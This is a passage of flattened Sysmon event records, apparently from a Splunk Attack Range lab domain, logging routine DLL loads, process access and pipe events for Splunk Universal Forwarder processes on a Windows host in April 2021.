(rs1_release.210407-2154)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=F9FE858A976B6D38FD5CEA46019B246A,SHA256=37F7417D0AA2A15121A14CF176F0C4A1B6BB01E290324CCA0DDB001F47E8C458trueMicrosoft WindowsValid 734700x80000000000000001605921Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.792{21761711-7A4D-6080-C160-00000000BB01}2624C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8trueMicrosoft WindowsValid 734700x80000000000000001605920Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.792{21761711-7A4D-6080-C160-00000000BB01}2624C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15trueMicrosoft WindowsValid 734700x80000000000000001605919Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.792{21761711-7A4D-6080-C160-00000000BB01}2624C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValid 10341000x80000000000000001605918Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.792{21761711-842B-607D-9B00-00000000BB01}31683556C:\Windows\system32\conhost.exe{21761711-7A4D-6080-C160-00000000BB01}2624C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x80000000000000001605917Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.792{21761711-7A4D-6080-C160-00000000BB01}2624C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\KernelBase.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=0F627827D9CFFA8E0BCF30F013FB7209,SHA256=EA47C3E471801ACA92EE449C66CF785EA670ADE92A5A2D5CDB81C93DD72ABEF0trueMicrosoft WindowsValid 734700x80000000000000001605916Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.792{21761711-7A4D-6080-C160-00000000BB01}2624C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\kernel32.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=A5AD62615D2361BFAEC6C047B199184C,SHA256=B43F3DFDAF7BAA7A2B97015631F96CE429C50348D380080CFC29C36F959D7886trueMicrosoft WindowsValid 734700x80000000000000001605915Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.792{21761711-7A4D-6080-C160-00000000BB01}2624C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\ntdll.dll10.0.14393.4350 (rs1_release.210407-2154)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=4C8F6DF16BD8E2739EC0D3439EA7507C,SHA256=79E203951A298D2818A9484A56521FA70DF19B7053F704378375128C7C48E8EEtrueMicrosoft WindowsValid 734700x80000000000000001605914Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.792{21761711-7A4D-6080-C160-00000000BB01}2624C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exeMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8trueSplunk, Inc.Valid 10341000x80000000000000001605913Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.792{21761711-83AC-607D-0500-00000000BB01}412528C:\Windows\system32\csrss.exe{21761711-7A4D-6080-C160-00000000BB01}2624C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001605912Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.776{21761711-842A-607D-9700-00000000BB01}37163760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{21761711-7A4D-6080-C160-00000000BB01}2624C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001605911Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.777{21761711-7A4D-6080-C160-00000000BB01}2624C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{21761711-83AD-607D-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8{21761711-842A-607D-9700-00000000BB01}3716C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 18141800x80000000000000001605910Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 19:17:33.776{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x80000000000000001605909Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreatePipe2021-04-21 19:17:33.776{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 18141800x80000000000000001605908Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 19:17:33.776{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x80000000000000001605907Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreatePipe2021-04-21 19:17:33.776{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 18141800x80000000000000001605906Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 19:17:33.776{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x80000000000000001605905Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreatePipe2021-04-21 19:17:33.776{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 23542300x80000000000000001094925Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:33.660{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=43D29DFBB0317DDF94A36D0117A6701E,SHA256=F8773C73B1E8A2A497539F28C845C665AA8A4C036E464EF790199302533C4900,IMPHASH=00000000000000000000000000000000falsetrue 534500x80000000000000001605904Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.237{21761711-7A4D-6080-C060-00000000BB01}7316C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe 734700x80000000000000001605903Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.237{21761711-7A4D-6080-C060-00000000BB01}7316C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659CtrueMicrosoft WindowsValid 734700x80000000000000001605902Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.237{21761711-7A4D-6080-C060-00000000BB01}7316C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\dbgcore.dll10.0.14321.1024 (debuggers(dbg).210127-1811)Windows Core Debugging HelpersMicrosoft® Windows® Operating SystemMicrosoftDBGCORE.DLLMD5=72E8FEC8419AB470FB737883463688FE,SHA256=1DA7D2D2D1C4E6EC17101A4997C4AA610818730D63C72C1D2084ABA3F25C5146trueMicrosoft WindowsValid 734700x80000000000000001605901Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.237{21761711-7A4D-6080-C060-00000000BB01}7316C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\dbghelp.dll10.0.14321.1024 (rs1_release.160715-1616)Windows Image HelperMicrosoft® Windows® Operating SystemMicrosoftDBGHELP.DLLMD5=2C92DF5D32661FB4B81B08B72B2102A7,SHA256=BCEF4DEBDE7D8D6916EE3D3E5E63A725E03A058AABCD7DD49DF9D48B16E96D1AtrueMicrosoft WindowsValid 734700x80000000000000001605900Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.121{21761711-7A4D-6080-C060-00000000BB01}7316C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=51FCB0FDEFCB9A3E4A1DC8C8673BC63C,SHA256=63A0E1A76B7ABCF56E44B548568649FFB6B5609402746D48A4DC77CCED20F5FEtrueMicrosoft WindowsValid 734700x80000000000000001605899Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.105{21761711-7A4D-6080-C060-00000000BB01}7316C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\rsaenh.dll10.0.14393.2969 (rs1_release.190503-1820)Microsoft Enhanced Cryptographic ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationrsaenh.dllMD5=B6E99FD898E948657373BB02708C7C00,SHA256=90476029BD7AB0FEC53AAE567AE53BC0B09C7C5C8C7B8F19485BA872B74ED591trueMicrosoft WindowsValid 734700x80000000000000001605898Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.105{21761711-7A4D-6080-C060-00000000BB01}7316C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\cryptsp.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptographic Service Provider APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptsp.dllMD5=9500AE4C4B639FEAEED0CC6C39F45149,SHA256=C1055D4B9A854282336A5404CA0FCB1A2EBC3417600035338C9CDFC7B8D0778CtrueMicrosoft WindowsValid 18141800x80000000000000001605897Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 19:17:33.105{21761711-7A4D-6080-C060-00000000BB01}7316\srvsvcC:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe 734700x80000000000000001605896Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.105{21761711-7A4D-6080-C060-00000000BB01}7316C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\srvcli.dll10.0.14393.0 (rs1_release.160715-1616)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=656F846CAED76C6FC5C76E8BACEF4EF6,SHA256=DFDE27C086764ACC1EA3E6A4E2BA50C2AB532F9E1D99203861F51910A8D850FBtrueMicrosoft WindowsValid 18141800x80000000000000001605895Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 19:17:33.105{21761711-7A4D-6080-C060-00000000BB01}7316\wkssvcC:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe 734700x80000000000000001605894Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.105{21761711-7A4D-6080-C060-00000000BB01}7316C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\wkscli.dll10.0.14393.0 (rs1_release.160715-1616)Workstation Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWKSCLI.DLLMD5=3DCBAE237E4E1F0EBE8E7DC053F778C4,SHA256=C3331CCBE71CC98A5F1BC013F1C0218FE194CA7B497DDF706BF9025AB5A7B330trueMicrosoft WindowsValid 734700x80000000000000001605893Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.105{21761711-7A4D-6080-C060-00000000BB01}7316C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923trueMicrosoft WindowsValid 734700x80000000000000001605892Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.105{21761711-7A4D-6080-C060-00000000BB01}7316C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\netapi32.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNetApi32.DLLMD5=F55166956AEAD05A141BA7E80B90AB7B,SHA256=B9BCF21D7F7E771C388C469B2611E8946166C62005B56D72421060DABFF7093FtrueMicrosoft WindowsValid 734700x80000000000000001605891Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.105{21761711-7A4D-6080-C060-00000000BB01}7316C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\msvcp140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationmsvcp140.dllMD5=BA72C2F6F465926980ADC2FB7F8B3490,SHA256=86881A7054532019291C162F0A8177980C1C2B45490F7E88543F22915D08D9FFtrueMicrosoft CorporationValid 734700x80000000000000001605890Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.105{21761711-7A4D-6080-C060-00000000BB01}7316C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\bcrypt.dll10.0.14393.4046 (rs1_release.201028-1803)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=51F4F9025E6D236F5BF2C24C09E42C8E,SHA256=AE196933C3E292680C83B09F24CE9E6D498E34ECDD30ACB8C1544EEB4705F285trueMicrosoft WindowsValid 734700x80000000000000001605889Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.105{21761711-7A4D-6080-C060-00000000BB01}7316C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\Wldap32.dll10.0.14393.3269 (rs1_release.190929-1234)Win32 LDAP API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWLDAP32.DLLMD5=12D6C3E8AC705BB42D377C05714F551C,SHA256=E67F6DB96F062A319312C365F1F55B2B38B0F90B77FFDA2522418709CBA45EB3trueMicrosoft WindowsValid 734700x80000000000000001605888Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.105{21761711-7A4D-6080-C060-00000000BB01}7316C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\adsldpc.dll10.0.14393.0 (rs1_release.160715-1616)ADs LDAP Provider C DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationadsldpcMD5=F03FD7F523CFDBB96B0F3B8012FC161D,SHA256=8218E5AC2D7A52A2D50CD8D3CC8AA8CE4E37D1BDECFA62BC2637AA32A01CBA54trueMicrosoft WindowsValid 734700x80000000000000001605887Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.105{21761711-7A4D-6080-C060-00000000BB01}7316C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5trueMicrosoft WindowsValid 734700x80000000000000001605886Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.105{21761711-7A4D-6080-C060-00000000BB01}7316C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\oleaut32.dll10.0.14393.4225 (rs1_release.210127-1811)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=BB3CFF02CD7B7C5704A3E8C77DC0C199,SHA256=016E4F1366708D0F7AD7017CDFCACBDC770C972B63E579EE9A20A98CD3301931trueMicrosoft WindowsValid 734700x80000000000000001605885Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.105{21761711-7A4D-6080-C060-00000000BB01}7316C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\winspool.drv10.0.14393.4169 (rs1_release.210107-1130)Windows Spooler DriverMicrosoft® Windows® Operating SystemMicrosoft Corporationwinspool.drvMD5=D21FAA584F844E61375D95B5BE9115EE,SHA256=E221EA0081FDE7AAAD71A38016A8D470082B3732E9ED2D8ED7C97E9F41AF0045trueMicrosoft WindowsValid 734700x80000000000000001605884Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.105{21761711-7A4D-6080-C060-00000000BB01}7316C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\vcruntime140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationvcruntime140.dllMD5=0C583614EB8FFB4C8C2D9E9880220F1D,SHA256=6CADB4FEF773C23B511ACC8B715A084815C6E41DD8C694BC70090A97B3B03FB9trueMicrosoft CorporationValid 734700x80000000000000001605883Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.105{21761711-7A4D-6080-C060-00000000BB01}7316C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4046 (rs1_release.201028-1803)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=E92A3F429653A81E4C53A0B474A817A5,SHA256=4ECAFDB8F0F20BFFC1A5516882FD59C961DEACC2B01F669ABF1D1895F6F90A55trueMicrosoft WindowsValid 734700x80000000000000001605882Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.105{21761711-7A4D-6080-C060-00000000BB01}7316C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\archive.dll-----MD5=98978F08A7A0D24C92FE8DC5287A8258,SHA256=CBB940A38E834C0BE44884C667863F76D6700D564043F90B3EB813370C3174E7trueSplunk, Inc.Valid 734700x80000000000000001605881Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.105{21761711-7A4D-6080-C060-00000000BB01}7316C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libeay32.dll1.0.2tOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/libeay32.dllMD5=6445BD4247E3956B244772F3C415585F,SHA256=2B08FC9E160AD0F698226DA3E30A12551E8EBCCA1E7287E3915EC62B58151A78trueSplunk, Inc.Valid 734700x80000000000000001605880Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.105{21761711-7A4D-6080-C060-00000000BB01}7316C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec-openssl.dll-----MD5=F30BB43EC30BE50400780223450492CD,SHA256=867D0453E285A5C29A4EFA039D2399662DCCAC98F88C46B0A41CEFB6B68DD836trueSplunk, Inc.Valid 734700x80000000000000001605879Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.105{21761711-7A4D-6080-C060-00000000BB01}7316C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\combase.dll10.0.14393.4350 (rs1_release.210407-2154)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=88632FDECDE467B887C3594BE2EC545C,SHA256=FFED4D80961917C785063411ED15CED1DB6588AD925E76D72E1BF684FFDBF25DtrueMicrosoft WindowsValid 734700x80000000000000001605878Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.105{21761711-7A4D-6080-C060-00000000BB01}7316C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec.dll-----MD5=D98BAB348C28C8CFCC11EDB575E2557A,SHA256=ADA3F1256B175ECC390F126D2730D7A1AAB5A53F1AF205A7667D8010416602F9trueSplunk, Inc.Valid 734700x80000000000000001605877Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.105{21761711-7A4D-6080-C060-00000000BB01}7316C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\ssleay32.dll1.0.2tOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/ssleay32.dllMD5=B20FA07A7A61791EE537B5945429E141,SHA256=EF53BC2AB58BC548EFA249B0B8F2E1FBB9D4739EF27B0C67DFF1468D555329D3trueSplunk, Inc.Valid 734700x80000000000000001605876Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.105{21761711-7A4D-6080-C060-00000000BB01}7316C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3trueMicrosoft WindowsValid 734700x80000000000000001605875Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.105{21761711-7A4D-6080-C060-00000000BB01}7316C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\ole32.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=676B0A1FB2A01D19AECB1F19883B6FC4,SHA256=56DEB219840DBAF9DAF645AD5D79AF9AB05F20E688382854DD487F440B257552trueMicrosoft WindowsValid 734700x80000000000000001605874Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.105{21761711-7A4D-6080-C060-00000000BB01}7316C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxslt.dll-----MD5=B8D3119CE62331C6A9B170DA0A608F28,SHA256=7D6C6B7C542B4E67AA468FEB12044E2EE34CE8F8A68C7665D7861F3363B6E66AtrueSplunk, Inc.Valid 734700x80000000000000001605873Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.105{21761711-7A4D-6080-C060-00000000BB01}7316C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\activeds.dll10.0.14393.4169 (rs1_release.210107-1130)ADs Router Layer DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationADsMD5=C62947CD1080E3B128B517AE91B22D6D,SHA256=6BB5D8967F822B5B1646DC9069212914D36C4D3D65E086AC0890B6A02112B438trueMicrosoft WindowsValid 734700x80000000000000001605872Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.105{21761711-7A4D-6080-C060-00000000BB01}7316C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxml2.dll2.9.9libxml2 librarylibxml2-libxml2.dllMD5=0E7B7B3B25A2F094EB3A7BAF471154B8,SHA256=6CFAC8D8D5B7345F2C6CC82CBF8F9DD475881EA260346BE283E52B822F2CCAC1trueSplunk, Inc.Valid 734700x80000000000000001605871Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.105{21761711-7A4D-6080-C060-00000000BB01}7316C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0trueMicrosoft WindowsValid 734700x80000000000000001605870Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.105{21761711-7A4D-6080-C060-00000000BB01}7316C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\rpcrt4.dll10.0.14393.4350 (rs1_release.210407-2154)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=BC930981DA6E598A6A2E87D8355CB38A,SHA256=34DB9A305C0574B5C1694A499221B520DFB2BFD894D8E95096ABF09F1182D758trueMicrosoft WindowsValid 734700x80000000000000001605869Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.105{21761711-7A4D-6080-C060-00000000BB01}7316C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\sechost.dll10.0.14393.3808 (rs1_release.200707-2105)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating 